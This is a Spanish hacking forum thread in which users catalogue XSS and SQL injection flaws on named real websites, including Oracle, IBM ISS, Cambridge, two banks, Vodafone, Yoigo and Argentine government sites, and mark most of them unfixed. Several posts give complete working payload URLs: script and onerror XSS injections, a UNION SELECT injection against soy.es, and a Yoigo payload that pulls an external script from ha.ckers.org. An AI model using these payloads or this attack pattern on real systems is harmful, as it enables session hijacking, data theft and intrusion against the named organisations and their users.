Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 1 Visitante están viendo este tema.

Guide_Shen

Sitio web: http://search.oracle.com/
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69865/
Fecha de descubrimiento: 14 de Octubre del 2010
Fecha de notificación: 14 de Octubre del 2010
Fecha de publicación: 15 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/d56mSZ
Evolution of Revolution  -  http://xsstorm.blogspot.com

Guide_Shen

Sitio web: http://webapp.iss.net/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwebappissnet-xss-vuln-ibm-iss.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/c8aZic
Post Data:
Evolution of Revolution  -  http://xsstorm.blogspot.com

Guide_Shen

Sitio web: http://www.admin.cam.ac.uk/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwwwadmincamacuk-xss-vuln-xshacked.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/bJky87
Post Data:
Evolution of Revolution  -  http://xsstorm.blogspot.com

Guide_Shen

Sitio web: http://www.pichincha.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/pichinchacom-ecuator-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco Ecuatoriano
poc: http://bit.ly/bzEtrC
Evolution of Revolution  -  http://xsstorm.blogspot.com

Guide_Shen

Sitio web: https://www.suntrust.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/suntrustcom-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco USA
poc: http://bit.ly/94jUw8
Post Data:
Evolution of Revolution  -  http://xsstorm.blogspot.com

Cleantesdeasso


Sitio web:http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=
Descubridor:clean735
URL del aviso:http://txt.io/clean735
Fecha de descubrimiento:10 de diciembre 2010
Fecha de notificación:10 de diciembre
Fecha de publicación: 10 de diciembre
Arreglado: no lo se
Información adicional:no m gusta macri. XSS en el buscador
http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=0&idoferta&idsala=0&idjornada=0&idmodalidad=0&idtitulo=0&idbarrio&idcgpc&distrito&texto=%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode%2877%2C97%2C99%2C114%2C105%2C95%2C110%2C97%2C122%2C105%29%29%3E&Buscar2=Buscar&redir=1&menu_id=10194
"Que no!! q el hash hay q crakiarlo!!"

iNETFRUIT

Sitio web: http://www.soy.es/
Descubridor: INETFRUIT +
Fecha de descubrimiento: 28 de Diciembre del 2010
Fecha de notificación: 28 de Diciembre del 2010
Fecha de publicación: 01 de Enero del 2011
Arreglado : no, unfixed.
Información adicional: Blogs gratis

http://soy.es/index.php?pag=indice&cat=1+and+1=2+union/**/select+0x30,0x31,0x32,concat%280x3A3078623464633064333A%29,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235--+--

tragantras

Sitio web: http://tienda.vodafone.es
Descubridor: tragantras
URL del aviso:   http://pastebin.com/8Q9789Y6
Fecha de descubrimiento: 17 Mayo del 2007
Fecha de notificación: 17 Mayo del 2007
Fecha de publicación: 17 Mayo del 2007
Arreglado: Not yet!
Información adicional:

XSS

http://tienda.vodafone.es/movil/samsung/galaxy_s_8gb?s=asdf%22%3Easd%3C/a%3E%3CsCrIpT%3Ealert%28%27xungo%20XSS!%27%29;%3C/sCrIpT%3E%3Csdf%20foo=%22
Colaboraciones:
1 2

tragantras

#38
Sitio web: www.yoigo.com
Descubridor: tragantras
URL del aviso: http://pastebin.com/WcRqGqaW
Fecha de descubrimiento: 21 Mayo del 2007
Fecha de notificación: 21 Mayo del 2007
Fecha de publicación: 21 Mayo del 2007
Arreglado: Not yet!
Información adicional:

XSS

POC FIREFOX & SECURELESS WEB-BROWSERS
http://www.yoigo.com/buscador.php?buscar=%22%20/%3E%3Cscript%3Ealert%283%29;%3C/script%3E

POC CHROME:
http://www.yoigo.com/buscador.php?buscar=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js?

Colaboraciones:
1 2

franco_tuv

Sitio web: http://www.tvpublica.com.ar
Descubridor: franco_tuv
Fecha de descubrimiento: 20 de Julio del 2011
Fecha de notificación: 20 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
http://www.tvpublica.com.ar/tvpublica/busqueda?searchText=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&page=1